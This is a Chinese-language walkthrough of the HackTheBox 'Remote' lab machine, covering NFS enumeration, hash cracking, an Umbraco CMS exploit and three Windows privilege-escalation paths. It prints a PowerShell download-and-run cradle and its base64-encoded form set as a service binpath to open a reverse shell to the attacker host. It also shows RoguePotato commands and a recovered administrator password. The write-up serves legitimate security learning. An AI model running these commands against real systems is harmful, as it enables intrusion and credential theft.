**
HackTheBox-windows-Remote-Walkthrough
**
靶机地址:https://www.hackthebox.eu/home/machines/profile/234
靶机难度:初级(4.7/10)
靶机发布日期:2020年9月1日
靶机描述:
Remote is an easy difficulty Windows machine that features an Umbraco CMS installation. Credentials are found in a world-readable NFS share. Using these, an authenticated Umbraco CMS exploit is leveraged to gain a foothold. A vulnerable TeamViewer version is identified, from which we can gain a password. This password has been reused with the local administrator account. Using psexec with these credentials returns a SYSTEM shell.
作者:大余
时间:2020-09-10
请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。
一、信息收集
可以看到靶机的IP是10.10.10.180…
利用masscan扫描发现21,80,135,139,111,445,5985,2049端口…
利用nmap深入扫描发现的端口,可看到FTP,SMB,HTTP和NFS服务正在运行…
直接上来就查看web服务,主页面情况…
往下滑动发现了几篇笔记文章,umbraco出现在眼前…搜索知道这是CMS的系统…
命令:gobuster dir -u http://10.10.10.180/ -w=/usr/share/dirb/wordlists/common.txt
可以看到利用gobuster爆破目录也发现了存在umbraco目录情况…
访问这是umbraco的CMS框架的登录页面…
需要用户名密码,默认密码无法登录,这里需要继续枚举别的端口了…
这里枚举了FTP匿名允许登录,但是目录空…
SMB虽然开放了,但是无法访问任何共享目录…
命令:
showmount -e 10.10.10.180
sudo mount -t nfs 10.10.10.180:/site_backups /home/dayu/桌面/dayuRemote/mnt
经过对2049端口NSF服务进行枚举,发现了site_backups路径,将它挂载在mnt目录中…
命令:strings Umbraco.sdf
在枚举中,APP_Data目录下发现了sdf数据库文件信息…利用strings枚举了该文件…
发现存在哈希b8be16afba8c314ad33d812f22a04991b90e2aaa…
这里利用john或者hashcat都可以爆破密码…发现了密码信息…
利用admin@ctf.com用户名密码成功登录了登录表单页面…
点击帮助发现了该版本信息…7.12.4
本地kali搜索该框架是否存在漏洞,发现了7.12.4存在可利用的EXP…
查看代码,发现了其中原理,利用用户名密码访问该框架后,调用xx.exe进程获得shell…
测试下ping…
测试成功的,获得了icmp的回包…
利用nishang的ps1进行提权…
开启监听模式,开启web服务,执行修改后的EXP,获得了shell外壳…权限是低权用户…
通过低权用户获得了user_flag信息…
需要提权到system,这里我上传了winPEAS进行靶机分析枚举…
发现了很多方法能提权…
方法1:
UsoSvc提权…
执行winPEAS看到UsoSvc:ALLAccess,可利用本地特权升级…
给出了黄色字体URL:https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
里面介绍了如何利用UsoSvc进行提权的POC…
命令:echo "IEX( IWR http://10.10.14.2/Invoke-PowerShellTcp.ps1 -UseBasicParsing)" | iconv -t utf-16le|base64 -w 0
查看该POC,经过测试,无法直接使用powershell命令直接执行上传shell提权…
需要转换为base64值…
命令:
sc.exe config UsoSvc binpath= "cmd.exe /c powershell.exe -EncodedCommand SQBFAFgAKAAgAEkAVwBSACAAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADQALgAyAC8ASQBuAHYAbwBrAGUALQBQAG8AdwBlAHIAUwBoAGUAbABsAFQAYwBwAC4AcABzADEAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACkACgA="
sc.exe stop UsoSvc
sc.exe start UsoSvc
通过利用sc.exe本地特权提升,通过上传nishang的shell,反弹获得了system特权外壳…
通过system最高权限获得了root_flag信息…
方法2:
土豆提权…
命令:
https://github.com/antonioCoco/RoguePotato/releases/download/1.0/RoguePotato.zip
iwr http://10.10.14.2/RoguePotato.exe -OutFile RoguePotato.exe
iwr http://10.10.14.2/RogueOxidResolver.exe -OutFile RogueOxidResolver.exe
由于UsoSvc权限是全开放的,ALL状态…
这里可以直接利用土豆提权即可…用过太多次了…但是这里在简单讲解一遍…
通过地址下载土豆…然后上传到靶机…
命令:https://github.com/antonioCoco/RoguePotato
在土豆页面看到了用的方法…
尝试不适用CLSID执行还是无效…需要查找下CLSID写入…
命令:http://ohpe.it/juicy-potato/CLSID/
选择win10…
然后找到UsoSvc…可看到CLSID有两个…
命令:./RoguePotato.exe -r 10.10.14.2 -c "{B91D5831-B1BD-4608-8198-D72E155020F7}" -e "cmd.exe /c powershell -EncodedCommand + base64-shell即可"
通过-c写入CLSID即可…成功执行后下载了nishang的shell,获得了system外壳…
方法3:
内核程序提权…TearmViewer…
tasklist枚举所有存在的进程,发现了存在TeamViewer进程运行中…
找到了win目录下VM的程序目录,是V7版本…
V7版本存在漏洞,而且MSF就有EXP方法…
命令:cat /usr/share/metasploit-framework/modules/post/windows/gather/credentials/teamviewer_passwords.rb
这里我未使用MSF进行读取…
我先利用search 查看了vm_passwd的EXP源码…
查看源码知道需要使用静态密匙AES…
通过google知道VM的V7版本注册表在:HKLM:\software\wow6432node\teamviewer\version7…
进入后通过命令(get-itemproperty -path .).SecurityPasswordAES读取到了AES静态码…
通过静态码,简单的按照EXP编写…
执行获得了administrator密码…
命令:evil-winrm -u administrator -p '!R3m0te!' -i 10.10.10.180
有了密码,这里有很多种方法可以登录…我利用了evil-winrm成功登录…
或者使用psexec、wmiexec都可以…
靶机全是经典的CVE漏洞提权…没有别的花里胡哨的东西…
适合初学者学习,非常棒的一台靶机…
由于我们已经成功得到root权限查看user和root.txt,因此完成这台初级的靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。
如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。
413
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
